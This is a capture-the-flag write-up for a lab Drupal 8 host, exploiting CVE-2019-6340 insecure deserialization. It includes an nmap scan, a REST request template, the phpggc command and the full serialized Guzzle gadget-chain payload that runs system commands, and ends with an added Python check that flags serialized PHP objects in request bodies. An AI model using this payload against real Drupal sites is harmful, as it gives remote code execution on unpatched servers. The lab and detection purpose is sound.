Not so Blind Rush CVE-2019-6340

The CVE

Insecure Deserialization

Source: https://portswigger.net/web-security/deserialization

Challenge Solution

Blog Post by Optimus Prime
nmap -p 80 -T4 -A host
Starting Nmap 7.80 ( https://nmap.org ) at DATE IST
Nmap scan report for host
Host is up (0.000058s latency).
Other addresses for localhost (not scanned): ::1
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Unix))
|_http-generator: Drupal 8 (https://www.drupal.org)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/
| /user/password/ /user/login/ /user/logout/ /index.php/admin/
|_/index.php/comment/reply/
|_http-server-header: Apache/2.4.41 (Unix)
|_http-title: Home | Cybertron
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.32
OS details: Linux 2.6.32
Network Distance: 0 hops
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.92 seconds
{
  "link": [
    {
      "value": "link",
      "options": "<SERIALIZED_CONTENT>"
    }
  ],
  "_links": {
    "type": {
      "href": "http://website.com/rest/type/shortcut/default"
    }
  }
}
phpggc guzzle/rce1 system id --json
O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}
When Drupal unserializes the options value, unserialize() triggers the gadget chain and the embedded system command is executed. The command string inside the serialized payload is swapped, with the length prefix updated to match the new string:
s:2:\"id\"
s:4:\"ls /\"
Contents of / directory
flag{blindrush_s@m_witwicky_is_0ur_l@st_h0p3}
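As an added defensive example, not part of the original writeup: a request-body check that decodes the HAL+JSON body shown above and flags any string field carrying a PHP serialized object, which is what reaches unserialize() in this bug. The two request bodies are constructed for the example; the class name is the one the phpggc gadget chain uses.

```python
import json
import re

# A PHP serialized object starts "O:<len>:"<class>":<n>:{" (or "C:" for the
# Serializable interface). Serialized arrays ("a:") name no class, so they
# cannot reach a magic method; only objects can start a gadget chain.
PHP_OBJECT_RE = re.compile(r'[OC]:\d+:"([A-Za-z0-9_\\]+)":\d+:\{')

# Constructed request bodies in the shape shown above. The JSON "\u0000"
# escapes become real NUL bytes only after decoding (PHP uses them to mark
# private/protected property names), so matching must run on decoded strings,
# not on the raw body text where the quotes are still escaped as \".
MALICIOUS_BODY = r'''{"link":[{"value":"link","options":"O:24:\"GuzzleHttp\\Psr7\\FnStream\":1:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:0:{}}"}],"_links":{"type":{"href":"http://website.com/rest/type/shortcut/default"}}}'''
BENIGN_BODY = r'''{"link":[{"value":"link","options":"a:1:{s:5:\"query\";a:0:{}}"}],"_links":{"type":{"href":"http://website.com/rest/type/shortcut/default"}}}'''


def walk_strings(node, path="$"):
    """Yield (json_path, value) for every string anywhere in a decoded body."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from walk_strings(value, f"{path}.{key}")
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from walk_strings(value, f"{path}[{index}]")
    elif isinstance(node, str):
        yield path, node


def find_serialized_objects(body):
    """Return [(json_path, php_class)] for each serialized PHP object found."""
    try:
        doc = json.loads(body)
    except ValueError:
        return []  # not JSON: nothing here can be decoded into a map field
    hits = []
    for path, text in walk_strings(doc):
        for match in PHP_OBJECT_RE.finditer(text):
            hits.append((path, match.group(1)))
    return hits


def classify(body):
    """'block' if any field would hand a PHP object to unserialize(), else 'allow'."""
    return "block" if find_serialized_objects(body) else "allow"
```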

Tushar Kulkarni

Security Enthusiast | A Web App Developer Sometimes